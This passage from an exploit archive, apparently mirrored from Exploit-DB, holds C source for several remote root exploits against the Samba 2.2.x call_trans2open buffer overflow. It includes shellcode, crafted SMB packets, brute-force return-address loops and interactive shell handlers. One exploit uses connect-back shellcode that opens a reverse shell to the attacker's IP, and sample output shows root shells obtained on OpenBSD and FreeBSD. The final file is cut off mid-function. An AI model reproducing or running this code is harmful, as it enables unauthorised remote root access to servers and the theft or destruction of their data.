	x82.sin_family=AF_INET;
	x82.sin_port=htons(port);
	x82.sin_addr=*((struct in_addr *)he->h_addr);
	memset(&(x82.sin_zero),0,8);

	if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1)
	{
		return(-1);
	}
	return(sock);
}

int re_connt(int sock,int type)
{
	if(sock==-1)
	{
		if(type)
		{
			fprintf(stderr," [-] Connect Failed.\n\n");
			exit(-1);
		}
		else return(-1);
	}
}

void send_recv_sh(int sock)
{
	int pk;
	struct timeval tm;
	char *t_cmd="su -l\n";
	char *n_cmd="uname -a;id;exec sh -i\n";
	char rbuf[1024];
	fd_set rset;
	memset((char *)rbuf,0,sizeof(rbuf));
	fprintf(stdout," [*] Executed shell successfully !\n");
	fprintf(stdout," [*] Command: # su -l; uname -a; id; exec sh -i\n\n");
	send(sock,t_cmd,strlen(t_cmd),0);
	send(sock,n_cmd,strlen(n_cmd),0);

	tm.tv_sec=10;
	tm.tv_usec=0;
	
	while(1)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(sock,&rset);
		FD_SET(STDIN_FILENO,&rset);

		select(sock+1,&rset,NULL,NULL,&tm);

		if(FD_ISSET(sock,&rset))
		{
			pk=read(sock,rbuf,sizeof(rbuf)-1);
			if(pk<=0)
			{
				fprintf(stdout," [*] Happy-Exploit\n\n");
				close(sock);
				exit(0);
			}
			rbuf[pk]=0;
			fprintf(stdout,"%s",rbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
			if(pk>0)
			{
				rbuf[pk]=0;
				write(sock,rbuf,pk);
			}
		}
	}
	return;
}

void banrl()
{
	fprintf(stdout,"\n Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD\n");
	fprintf(stdout,"                                                     by Xpl017Elz.\n\n");
}

void usage(char *p_name)
{
	int r_s=0;
	fprintf(stdout," Usage: %s -option [argument]\n",p_name);
	fprintf(stdout,"\n\t-h - hostname. (default: localhost)\n");
	fprintf(stdout,"\t-s - shellcode. (select target)\n");
	fprintf(stdout,"\t-t - target number.\n");
	fprintf(stdout,"\t-b - auto brute-force attack mode.\n");
	fprintf(stdout,"\t-i - help information.\n\n");
	fprintf(stdout," Select target number:\n\n");
	
	for(;;)
	{
		if(plat[r_s].ost==NULL)
			break;
		else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost);
		r_s++;
	}
	fprintf(stdout,"\n Example> %s -hlocalhost -s 0x82828282\n\n",p_name);
	exit(-1);
}

/*
**
** OpenBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t1
**
**  Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
**                                                      by Xpl017Elz.
**
**  [0] Target: OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x
**  [1] Set socket.
**  [2] Make shellcode & Send Packet.
**  [3] Trying 61.37.xxx.xx:10000.
**  [*] Connected to 61.37.xxx.xx:10000.
**  [*] Executed shell successfully !
**  [*] Command: # su -l; uname -a; id; exec sh -i
**
** tset: standard error: Operation not supported
** OpenBSD testsub 3.0 GENERIC#94 i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: No controlling tty (open /dev/tty: Device not configured)
** sh: Can't find tty file descriptor
** sh: warning: won't have full job control
** #
** --
**
** FreeBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t0
**
**  Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
**                                                      by Xpl017Elz.
**
**  [0] Target: FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x
**  [1] Set socket.
**  [2] Make shellcode & Send Packet.
**  [3] Trying 61.37.xxx.xx:10000.
**  [*] Connected to 61.37.xxx.xx:10000.
**  [*] Executed shell successfully !
**  [*] Command: # su -l; uname -a; id; exec sh -i
**
** Warning: no access to tty (Bad file descriptor).
** Thus no job control in this shell.
** FreeBSD localhost 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 21:23:26 GMT 2002     
** murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC  i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: can't access tty; job control turned off
** #
** --
**
*/
		

- 漏洞信息 (22469)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2) (EDBID:22469)
unix remote
2003-04-07 Verified
0 c0wboy
N/A [点击下载]
source: http://www.securityfocus.com/bid/7294/info
 
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
 
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
 
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

/*  0x333hate => samba 2.2.x remote root exploit
 *
 *  generic linux x86 samba remote root
 *  exploit, based on trans2root.pl
 *
 *  coded by c0wboy
 *
 *  ~ www.0x333.org ~
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define fatal(x...) { fprintf (stderr, ##x); exit(-333); }

#define BUFFER 1500
#define SHELL  5074
#define PORT   139
#define NOP    0x90
#define START  0xbfffffff
#define STOP   0xbf000000
#define OFFSET 512

typedef enum {FALSE,TRUE} BOOLEAN;


unsigned char setup1[] =
         "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00"
         "\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00"
         "\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";

unsigned char setup2[] =
         "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00"
         "\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64"
         "\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

unsigned char overflow[] =
         "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07"
         "\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x90";

unsigned char shellcode[] =
         "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
         "\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89"
         "\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
         "\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
         "\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
         "\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
         "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
         "\x80";

int main (int argc, char *[]);
void usage (char *);
void hate (unsigned long);
void exploit (void);
BOOLEAN connection(char *, int);
int owned (int);

char buffer[BUFFER];
char zero[808] = "";
char * target=NULL;
int port = PORT;

struct sockaddr_in temp;
struct hostent *h;
int fdsocket;

void
usage (char * prg)
{
   fprintf (stderr, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
   fprintf (stderr, " [~]        coded by c0wboy ~ www.0x333.org       [~]\n\n");
   fprintf (stderr, " Usage : %s [-t target] [-p port] [-h]\n\n", prg);
   fprintf (stderr, " \t-t\ttarget to attack\n");
   fprintf (stderr, " \t-p\tsamba port (default 139)\n");
   fprintf (stderr, " \t-h\tdisplay this help\n\n");

   exit(-333);
}

void
hate (unsigned long ret)
{
   int i;
   char *ptr=buffer;

   bzero(buffer, BUFFER);

   memcpy ((char *)ptr, overflow, 96);

   ptr += 96;
   memset ((char *)ptr, NOP, (772+36));

   ptr += (772+36);
   memcpy ((char *)ptr, shellcode, strlen (shellcode));

   ptr += strlen (shellcode);
   memset ((char *)ptr, NOP, (87+44));

   ptr += (87+44);

   for (i = 1127 ; i < 1159 ; i += 4)
      *(long *) &buffer[i] = ret;
}

void
exploit (void)
{
   BOOLEAN status;
   char outside[333];

   if(!(status = connection (target, port)))
      fatal (" [~] Error in connection\n");

   /* here we setup connection */
   if (send (fdsocket, setup1, sizeof (setup1)-1, 0) < 0)
      fatal (" [~] Error in setup (1) connection\n");
   recv (fdsocket, outside, sizeof (outside)-1, 0);

   if (send (fdsocket, setup2, sizeof (setup2)-1, 0) < 0)
      fatal (" [~] Error in setup (2) connection\n");
   recv (fdsocket, outside, sizeof (outside)-1, 0);

   /* exploiting samba */
   if (send (fdsocket, buffer, sizeof (buffer)-1, 0) < 0)
      fatal (" [~] Error in exploiting samba\n");

   if (send (fdsocket, zero, sizeof (zero)-1, 0) < 0)
      fatal (" [~] Error in exploiting samba\n");

   close (fdsocket);

   if((status = connection (target, SHELL)))
   {
      owned (fdsocket);
      close (fdsocket);
   }
}

BOOLEAN
connection (char *host, int port)
{
   BOOLEAN status = TRUE;

   temp.sin_family = AF_INET;
   temp.sin_port = htons (port);
   h = gethostbyname (host);
      
   if (h == 0)
      status = FALSE;
   else 
   {
      bcopy (h->h_addr,&temp.sin_addr,h->h_length);

      if ((fdsocket = socket (AF_INET,SOCK_STREAM,0)) < 0)
         status = FALSE;
      else
         if ((connect (fdsocket, (struct sockaddr*) &temp, sizeof (temp))) < 0)
            status = FALSE;
   }
   return status;
}

int 
owned (int fdsocket)
{
   fd_set cya;
   char outside[1024], *cmd="uname -a;id;\n";
   int x;

   FD_ZERO (&cya);
   FD_SET (fdsocket, &cya);
   FD_SET (0, &cya);

   send (fdsocket, cmd, strlen (cmd), 0);

   for(;;)
   {
      FD_SET (fdsocket, &cya);
      FD_SET (0, &cya);

      if (select (FD_SETSIZE, &cya, NULL, NULL, NULL) < 0)
         break;

      if (FD_ISSET (fdsocket, &cya))
      {
         if ((x = recv (fdsocket, outside, sizeof (outside)-1, 0)) < 0)
            fatal (" [-] cya\n");

         if (write (1, outside, x) < 0)
            break;
      }

      if (FD_ISSET (0, &cya))
      {
         if ((x = read (0, outside, sizeof (outside)-1)) < 0)
         fatal ("[-] cya\n");

         if (send (fdsocket, outside, x, 0) < 0)
            break;
      }

      usleep(10);
   }

   fprintf (stderr, " [-] cya hax0r\n");
   exit(0);
}


int
main (int argc, char * argv[])
{
   int c;
   unsigned long ret;

   while((c=getopt (argc, argv, "ht:p:")) != EOF)
   {
      switch(c)
      {
         case 't': target = optarg; break;
         case 'p': port = atoi (optarg); break;
         case 'h': usage (argv[0]);
         default : usage (argv[0]);
      }
   }

   if (argc==1 || target == NULL)
      usage (argv[0]);

   fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
   fprintf (stdout, " [~]        coded by c0wboy ~ www.0x333.org       [~]\n\n");

   fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
   fprintf (stdout, " [-] stating bruteforce\n\n");

   for (ret=START; ret>=STOP; ret-=OFFSET)
   {
      fprintf (stdout, " [-] testing 0x%x\n", ret);
      hate (ret);
      exploit ();
   }
   fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
   return 0;
}


		

- 漏洞信息 (22470)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (3) (EDBID:22470)
unix remote
2003-05-12 Verified
0 eDSee
N/A [点击下载]
source: http://www.securityfocus.com/bid/7294/info
  
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
  
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
  
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

/*
 *  Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
 *  Using connect back method and brute force mode.
 *  I just create & modify some code and ripped too :P 
 *  Create on May, 12st 2003
 *
 *  Thanks to eDSee (netric.org), Sambal is nice exploit bro...
 *  References: trans2root.pl, 0x333hate.c, sambal.c
 *  This code just for eduction purpose 
 *
 *  XNUXER RESEARCH LABORATORY
 *  Official Site: http://infosekuriti.com
 *  Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char
linux_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
    "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
    "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
    "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
    "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
    "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
    "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
    "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
    "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
    "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
    "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
    "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80";

char
bsd_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
    "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
    "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
    "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
    "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
    "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
    "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
    "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
    "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
    "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
    "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
    "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char  flags;
	unsigned short flags2;
	unsigned char  pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;

pid_t childs[50];
int LOOP = 1;
struct sockaddr_in serv_addr;
int sock_listen, client;
int exploit_pid;
int listen_pid;
int port_listen = 45295;

void 
usage(char *prog) 
{
int i;

   fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n"
                   "Connect back method, Xnuxer-Labs, 2003.\n"
                   "Usage  : %s <type> <victim> <your_ip>\n"
                   "Targets:\n"
                   "         0 = Linux\n"
                   "         1 = FreeBSD/NetBSD\n"
                   "         2 = OpenBSD 3.0 and prior\n"
                   "         3 = OpenBSD 3.2 - non-exec stack\n\n", prog);      
   exit(1);
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   connect_read, connect_write;
	struct timeval           timeout;
	int                      getsockopt_length = 0;
	int                      getsockopt_error = 0;
	struct sockaddr_in       server;
	bzero(&server, sizeof(server));
	server.sin_family = AF_INET;
	inet_pton(AF_INET, ip, &server.sin_addr);
	server.sin_port = htons(port);

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
    		return -1;
  	}
  
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
    		return -1;
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&connect_read);
	FD_ZERO(&connect_write);
	FD_SET(fd, &connect_read);
	FD_SET(fd, &connect_write);

	if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
		if(errno != EINPROGRESS) {
      			close(fd);
      			return -1;
    		}
  	}
	else {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;

	}

	select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;

	}

	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
		if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
			getsockopt_length = sizeof(getsockopt_error);

			if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
				errno = ETIMEDOUT;
				close(fd);
				return -1;
			}

			if(getsockopt_error == 0) {
				if(fcntl(fd, F_SETFL, flags) < 0) {
					close(fd);
					return -1;
				}
				return 1;
		        } 

			else {
				errno = getsockopt_error;
				close(fd);
				return (-1);
				}

			}
		}
	else {
		close(fd);
		return 1;
	}

	if(fcntl(fd, F_SETFL, flags) < 0) {
		close(fd);
		return -1;
	}
	return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdread;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return (-1);
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdread);
	FD_SET(fd, &fdread);
	select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return (-1);
	}

	if(select_status == -1) {
		close(fd);
		return (-1);
	}
  
	if(FD_ISSET(fd, &fdread)) {
  
  		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;
	
	} 
	else {
		close(fd);
		return 1;

	}
}

int
write_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdwrite;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
		close(fd);
		return (-1);
	}
	
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdwrite);
	FD_SET(fd, &fdwrite);

	select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;
	}
	
	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &fdwrite)) {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}
		return 1;
	}
	else { 
		close(fd);
		return -1;
	}
}

int 
start_session(int sock)
{
	char buffer[1000];
	char response[4096];
	char session_data1[] 	= "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
        char session_data2[] 	= "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
		                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
	
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type 	= 0x00;         /* session message */
        netbiosheader->flags 	= 0x00;
        netbiosheader->length 	= htons(0x2E);

        smbheader->protocol[0] 	= 0xFF;
        smbheader->protocol[1] 	= 'S';
        smbheader->protocol[2] 	= 'M';
        smbheader->protocol[3] 	= 'B';
        smbheader->command 	= 0x73;         /* session setup */
        smbheader->flags 	= 0x08;         /* caseless pathnames */
        smbheader->flags2 	= 0x01;         /* long filenames supported */
        smbheader->pid 		= getpid() & 0xFFFF;
	smbheader->uid          = 100;
        smbheader->mid 		= 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

	if(write_timer(sock, 3) == 1)
		if (send(sock, buffer, 50, 0) < 0) return -1;

	memset(response, 0x00, sizeof(response));

	if (read_timer(sock, 3) == 1)
		if (read(sock, response, sizeof(response) - 1) < 0) return -1;
	
        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

	//if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
	smbheader->pid          = getpid() & 0xFFFF;
	smbheader->tid		= 0x00;
        smbheader->uid          = 100;

	memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

	char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

	int i = 0;
	unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
	smbheader->tid			= 0x01;
        smbheader->uid                  = 100;

	memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	buffer[1096] = 0xEB;
	buffer[1097] = 0x70;

	for (i = 0; i < 4 * 24; i += 8) {
		memcpy(buffer + 1099 + i, &dummy, 4);
		memcpy(buffer + 1103 + i, &ret,   4);
	}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
			exploit_data, sizeof(exploit_data) - 1);
	memcpy(buffer + 1800, shellcode, strlen(shellcode));

	if(write_timer(sock, 3) == 1) {
		if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
		return 0;
	}

	return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	for (i = 0; i < 4 * 24; i += 4)
		memcpy(buffer + 1131 + i, &dummy, 4);
		
        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024], *cmd="uname -a;id;\n";
 int n;

 send(sock, cmd, strlen(cmd), 0);

 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);

  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }

  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
